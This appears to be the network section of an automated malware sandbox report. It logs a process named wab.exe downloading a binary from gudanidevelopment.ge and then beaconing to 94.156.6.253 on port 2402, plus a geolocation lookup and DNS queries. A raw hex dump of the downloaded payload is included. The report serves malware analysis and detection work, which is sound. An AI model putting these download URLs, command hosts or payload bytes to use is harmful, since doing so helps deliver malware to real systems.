                                                                                                                                                                                        Oct 30, 2023 14:17:54.829169035 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829188108 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829219103 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829278946 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829341888 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829372883 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829418898 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829483032 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829530954 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829699039 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830382109 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830539942 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830651045 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830754042 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830769062 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830851078 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830910921 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.830969095 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831027031 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831068993 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831130981 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831177950 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831197977 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831326962 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831382990 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831437111 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831538916 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831551075 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831681967 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831732035 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831753016 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831828117 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831830025 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.831906080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832046986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832190990 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832191944 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832305908 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832403898 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832482100 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832536936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832565069 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832622051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832685947 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832742929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832745075 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832880974 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832890034 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.832966089 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833026886 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833086967 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833091021 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833164930 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833187103 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833250046 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833313942 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833372116 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833429098 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833432913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833482981 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833513021 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833584070 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833642006 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833760977 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833830118 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833893061 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833950996 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.833977938 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834033012 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834161997 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834161997 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834300041 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834362030 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834407091 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834497929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834549904 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834639072 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834701061 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834758997 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834794998 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834831953 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834952116 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.834959984 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.835177898 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.852988005 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853105068 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853198051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853290081 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853374958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853416920 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853458881 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853524923 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853553057 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853641033 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853642941 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853733063 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853816986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853898048 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853977919 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.853995085 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854065895 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854135990 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854151011 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854237080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854321957 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.854489088 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.057941914 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058026075 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058082104 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058140039 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058193922 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058248997 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058303118 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058356047 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058449984 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058479071 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058542967 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058604956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058659077 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058713913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058896065 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.058954000 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059006929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059061050 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059113979 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059166908 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059220076 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059273005 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059325933 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059349060 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059350014 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059350014 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059413910 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059415102 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059492111 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059546947 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059602022 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059715986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059756041 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059788942 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059858084 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059870958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059946060 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060005903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060106039 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060117960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060168028 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060223103 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060275078 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060301065 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060375929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060430050 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060456038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060503006 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060782909 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:56.449378014 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:56.449556112 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:59.014291048 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251811981 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251859903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251945972 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.252002954 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.252172947 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.254100084 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.254162073 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489383936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489448071 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489564896 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.496356010 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.496511936 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:06.594631910 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:06.597311974 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:06.887963057 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:37.298826933 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:37.300952911 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:37.591021061 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:08.087601900 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:08.090003967 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:19:08.388150930 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:38.361813068 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:38.429027081 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:38.869733095 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:38.871763945 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:19:38.986676931 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:39.169465065 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:39.174156904 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:40.220698118 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:40.673769951 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:42.673310041 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:43.657494068 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:47.578598976 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:49.625041962 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:57.388964891 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:20:01.544282913 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:20:09.593885899 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:09.596127987 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:20:09.888312101 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:17.009545088 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:20:25.367176056 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:20:40.363724947 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:40.368549109 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:20:40.669166088 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:21:11.172322035 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:21:11.174462080 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:21:11.466244936 CET24025009494.156.6.253192.168.11.20

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Oct 30, 2023 14:17:48.396938086 CET5925053192.168.11.201.1.1.1
                                                                                                                                                                                        Oct 30, 2023 14:17:49.283382893 CET53592501.1.1.1192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.974205017 CET6506953192.168.11.201.1.1.1
                                                                                                                                                                                        Oct 30, 2023 14:17:52.148176908 CET53650691.1.1.1192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:52.904098034 CET4925553192.168.11.201.1.1.1
                                                                                                                                                                                        Oct 30, 2023 14:17:53.035227060 CET53492551.1.1.1192.168.11.20

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 30, 2023 14:17:48.396938086 CET192.168.11.201.1.1.10xb0ddStandard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 30, 2023 14:17:51.974205017 CET192.168.11.201.1.1.10xc438Standard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 30, 2023 14:17:52.904098034 CET192.168.11.201.1.1.10xc879Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 30, 2023 14:17:49.283382893 CET1.1.1.1192.168.11.200xb0ddNo error (0)gudanidevelopment.ge217.147.225.69A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 30, 2023 14:17:52.148176908 CET1.1.1.1192.168.11.200xc438Name error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 30, 2023 14:17:53.035227060 CET1.1.1.1192.168.11.200xc879No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • gudanidevelopment.ge
                                                                                                                                                                                        • geoplugin.net

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.11.2050093217.147.225.6980C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Oct 30, 2023 14:17:49.596832991 CET14OUTGET /IogvoayYhe139.bin HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                        Host: gudanidevelopment.ge
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 30, 2023 14:17:49.904386997 CET15INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 30 Oct 2023 13:17:49 GMT
                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                        Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 494656
                                                                                                                                                                                        Cache-Control: s-maxage=10
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Data Raw: 58 bc 9a 79 03 af 7f af 05 ca 76 8e 7b aa 66 c3 7b 56 3a 03 c8 ff 2a 61 e6 69 58 3a c9 e6 54 f5 ab f0 61 e6 74 59 53 7f c4 22 b6 05 f3 13 de 2b f3 df 32 a6 1d 7c 4f 02 49 39 5d 98 f1 78 4d 31 6a 70 23 2f a7 76 a0 17 65 98 e4 ed 74 81 9b 8f d0 af dd 9a eb 62 67 78 eb 6f d5 6c 87 c1 d6 b4 02 69 2a 73 04 45 b3 35 c5 95 40 72 44 ec 4c 49 a6 ec 5d 73 34 b8 37 e9 a1 88 ae ba 71 be b0 de 83 34 1a 3e 2c c7 69 eb c5 73 c6 bd 21 d5 65 08 5a 98 c8 83 7f 96 84 d7 f5 02 ff ff a9 49 94 fa 3e 18 bb 3f 4c e9 45 a0 c8 7b aa cb 70 7a c8 8a 15 09 5b 14 46 33 81 5f 8f 05 dc 68 7d 0a c8 68 68 42 e2 e3 ca 70 26 3b 0b 4e 49 d2 86 5f 01 b8 4b 72 ef 27 b1 ca 49 02 ef df a0 29 fb 90 60 3f 81 32 52 19 5e 77 4a 55 8e cf ad e0 22 8f a2 6d ce 89 d1 22 1f b5 88 dc 8d ff 42 8f d8 04 b0 d3 e8 13 bc 63 b7 b2 cf 72 e5 8a ac 7c 65 ab 97 c1 a0 64 b4 8f 21 05 52 74 d2 87 f8 94 ad 1f 94 46 3c f5 3a be 76 07 2c 59 c2 1a 5d d0 86 83 d6 8d 97 bd 98 f6 ff bc 29 c3 99 9d 1d 31 31 ea 9a c9 21 2f 7c 0a b9 40 5d b6 13 fe 06 4d 06 46 df 34 46 5f 02 db 3c 19 8b ee e0 41 50 bf c9 aa 41 04 40 33 e1 23 bb f9 d7 85 5c 9c 6f 28 26 f9 30 0d e2 ca 65 58 df 25 51 32 0d 34 33 7c 80 6e 89 46 d6 39 ea 7f 59 cb 4d 46 cc 87 c2 32 70 21 bf 10 9c fa 1c d4 5f 90 32 9e fa fd c4 02 07 36 bf a3 e0 aa 29 79 57 0b cf b6 fd 2b e4 6e 8f d6 9e 6e 07 f6 44 90 7f 2f 3c ee 3e 41 ca 5a 41 b4 b7 dc 61 56 8f 54 e3 a8 a6 9c 9a dc 0a 66 66 49 af 18 61 34 87 a5 00 cd f3 73 40 dd 9b 13 11 73 4b f2 17 23 bf 78 d4 f5 6b 18 6d 4f 7d 4e 9e e3 3e dc 0d a8 32 84 6d d8 98 05 25 a4 58 55 83 b9 61 5f 67 86 55 59 ed fa 80 62 86 36 b3 71 6c 02 00 d1 78 42 0a 59 55 74 3e fd 19 98 5f 44 be d3 51 c6 e2 5f e0 69 34 a7 96 11 10 01 e9 b1 1a 78 b3 f8 02 36 3b 5f 20 80 44 af 0f 9a 3c c0 94 27 91 93 1e 15 ed 77 50 d4 90 79 e8 13 96 cd a1 32 72 51 7b bb b2 5c b3 b6 f8 df e9 6e 11 7b dc 3e 4e 39 ad 4f e4 21 0c 1e e5 37 64 95 ff bc 49 eb 98 aa e5 07 31 58 98 c0 76 61 36 17 69 54 21 73 84 ce 14 3d 3a e0 ac 76 8b 98 4f 3b 60 e8 c1 bc 5e c3 11 6b 04 16 69 27 bd 31 43 97 e7 a2 17 c2 d9 db 79 0c b9 d5 9b 49 4a 32 83 80 77 b0 a1 dd 73 3d 02 14 c4 89 c9 52 1e 4c 92 70 3d d5 50 bd ea 79 cc 5a 19 05 89 ee c0 b2 ca fe a1 d7 dc dc 1c f4 d4 79 ac a8 9b cc f0 51 51 e4 3d 2b 8d 04 e3 ac 83 1e f8 77 9c 3f f8 5f 34 d2 82 2a e2 08 b8 b0 e0 88 4d 42 48 0b 26 69 94 ee 87 f5 f3 bc c4 8e 6b 34 5f 27 b6 d4 fd 49 9c 9c e8 33 25 e7 ba 57 e4 c6 83 bb 03 6c 67 07 1c 7d 63 63 ce 3a ac 24 83 99 ed db 79 8d fb c5 6b f2 e5 4c 60 43 0c 55 56 0c 93 96 ac 0b ea 37 01 cf 22 5f ef c0 b4 85 25 3c 27 10 19 35 c0 32 f0 1a 08 28 17 71 76 be 81 2c 0b 04 b2 f9 55 18 e2 7d 9a 9b a0 3f 7b eb ad 83 d5 30 b9 cf a9 6f 03 ec 5c 2a a9 e4 af e5 41 cf 36 c9 53 36 cb a4 e6 64 dc de 76 0f 0d ae 30 2c 6b 21 14 96 2c 8c 82 78 eb 51 b3 3c ab cb 14 e5 08 14 6c f5 ac 61 82 54 48 bf f5 d7 4c 4e 21 19 9d 21 bd 17 0d 11 80 e9 fd 89 d8 80 77 a0 ae 08 44 a0 6e a4 c8 3a c2 6d ab 7a 48 e0 48 46 2a 8a 2f fa b2 e9 20 a0 5d 96 2f 23 fa df cb 07 83 93 0e ce 6e 33 73 47 30 7b 76 0c 7a 5f 24 42 90 84 32 08 5e 36 d3 63 7b 38 e8 a5 ce d5 cc c6 de f9 ab e1 58 14 e3 c2 40 c2 03 6e 56 18 f1 4c a5 63 22 83 0c 36 d8 2f 97 03 29 d5 b6 a0 b0 13 6e 03 2e c1 aa ff ec 9a 4e 8c 4b 53 ed 26
